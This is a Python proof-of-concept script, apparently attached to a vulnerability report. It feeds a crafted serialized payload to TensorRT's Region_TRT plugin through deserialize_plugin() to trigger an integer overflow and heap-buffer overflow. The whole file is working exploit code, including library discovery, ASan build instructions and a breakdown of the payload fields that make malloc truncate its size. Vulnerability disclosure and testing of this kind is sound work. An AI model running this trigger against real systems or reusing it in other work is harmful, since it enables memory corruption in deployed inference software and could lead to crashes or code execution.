File size: 4,621 Bytes
398500f
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
#!/usr/bin/env python3
"""
Trigger TensorRT Region plugin heap overflow via deserialize_plugin().

This script loads a malicious serialized payload and feeds it to
RegionPluginCreator.deserialize_plugin(), which internally calls
Region::Region(buffer, length) — the vulnerable deserialization constructor.

Requirements:
  - TensorRT Python package (pip install tensorrt)
  - TensorRT OSS plugin library (libnvinfer_plugin.so) built from source
    https://github.com/NVIDIA/TensorRT

For ASan detection, build the OSS plugins with:
  cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=address"
  make -j$(nproc) nvinfer_plugin

Usage:
  python3 gen_payload.py           # generates malicious_region_payload.bin
  python3 trigger_deserialize.py   # triggers the heap overflow
"""
import ctypes
import struct
import sys
import os
import glob

def find_and_load_plugin_lib():
    """Try to find and load libnvinfer_plugin.so with OSS plugins."""
    search_paths = [
        # Built from TensorRT OSS source
        "TensorRT/build/out/libnvinfer_plugin.so",
        "/content/TRT/build/out/libnvinfer_plugin.so",
        # Docker container
        "/usr/lib/x86_64-linux-gnu/libnvinfer_plugin.so",
    ]
    
    # Also search LD_LIBRARY_PATH
    for p in os.environ.get("LD_LIBRARY_PATH", "").split(":"):
        if p:
            search_paths.append(os.path.join(p, "libnvinfer_plugin.so"))
    
    for path in search_paths:
        for match in glob.glob(path):
            if os.path.exists(match):
                return match
    return None

def main():
    payload_file = "malicious_region_payload.bin"
    if len(sys.argv) > 1:
        payload_file = sys.argv[1]
    
    if not os.path.exists(payload_file):
        print(f"[-] {payload_file} not found. Run gen_payload.py first.")
        sys.exit(1)
    
    with open(payload_file, "rb") as f:
        payload = f.read()
    print(f"[+] Loaded {payload_file}: {len(payload)} bytes")
    
    # Load TensorRT
    try:
        import tensorrt as trt
        print(f"[+] TensorRT {trt.__version__}")
    except ImportError:
        print("[-] TensorRT Python package not found. Install with: pip install tensorrt")
        sys.exit(1)
    
    # Load OSS plugin library (contains Region_TRT)
    plugin_path = find_and_load_plugin_lib()
    if plugin_path:
        print(f"[+] Loading plugin lib: {plugin_path}")
        ctypes.CDLL(plugin_path, mode=ctypes.RTLD_GLOBAL).initLibNvInferPlugins(None, b'')
    else:
        print("[!] OSS plugin library not found, trying default registry...")
    
    # Find Region_TRT creator
    region_creator = None
    for c in trt.get_plugin_registry().all_creators:
        if c.name == "Region_TRT":
            region_creator = c
            break
    
    if not region_creator:
        print("[-] Region_TRT plugin not found in registry.")
        print("    Build TensorRT OSS plugins first:")
        print("    git clone https://github.com/NVIDIA/TensorRT.git")
        print("    cd TensorRT && mkdir build && cd build")
        print("    cmake .. -DBUILD_PARSERS=OFF -DBUILD_SAMPLES=OFF")
        print("    make -j$(nproc) nvinfer_plugin")
        sys.exit(1)
    
    print(f"[+] Region_TRT v{region_creator.plugin_version}")
    
    # Parse payload header for display
    if len(payload) >= 32:
        C, H, W, num, classes, coords = struct.unpack_from("<6i", payload, 0)
        flags = list(payload[24:32])
        print(f"[*] Payload header: C={C} H={H} W={W} num={num} classes={classes} coords={coords}")
        print(f"[*] Flags: softmaxTree={flags[0]} leaf={flags[1]}")
        if len(payload) >= 36:
            n_val = struct.unpack_from("<i", payload, 32)[0]
            print(f"[*] smTreeTemp->n = {n_val} (0x{n_val & 0xFFFFFFFF:08x})")
            print(f"[*] malloc will compute: {n_val} * 4 = {n_val * 4} -> 0x{(n_val * 4) & 0xFFFFFFFF:08x} (truncated)")
    
    print()
    print("[!] Calling RegionPluginCreator.deserialize_plugin() with malicious data...")
    print("[!] This triggers Region::Region(buffer, length) -> allocateChunk() integer overflow")
    print("[!] Expected: heap-buffer-overflow (visible with ASan)")
    print()
    
    try:
        bad_plugin = region_creator.deserialize_plugin("region", payload)
        print(f"[+] Plugin deserialized (returned: {bad_plugin})")
        print("[!] Without ASan, the heap overflow is silent but corruption has occurred.")
        print("[!] Build libnvinfer_plugin.so with -fsanitize=address to see the crash.")
    except Exception as e:
        print(f"[!] Exception during deserialization: {e}")

if __name__ == "__main__":
    main()